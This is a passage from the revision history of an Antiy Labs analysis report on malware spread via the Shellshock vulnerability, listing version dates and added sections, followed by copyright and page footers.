2014-09-29 16:00 V1.2 增加 VDS 匹配样本分析 2014-09-29 16:30 V1.3 增加 perl 分析 2014-09-29 18:50 V1.4 增加各样本单独分析 ( 网络 代码 ) 2014-09-29 20:30 V1.5 增加破壳漏洞利用代码流程分析 2014-09-29 22:30 V1.6 增加破壳漏洞投放样本同源性分析 2014-09-30 00:30 V1.7 针对 Linux/MacOS 恶意代码总结 2014-09-30 11:30 V1.8 修改总结 2014-09-30 18:59 V1.81 完善 修订和纠错 2014-10-13 11:40 V1.82 更换模板 2014-10-19 09:30 V1.9 样本分析部分修改 安天实验室版权所有, 欢迎无损转载第 22 页

安天实验室版权所有, 欢迎无损转载第 23 页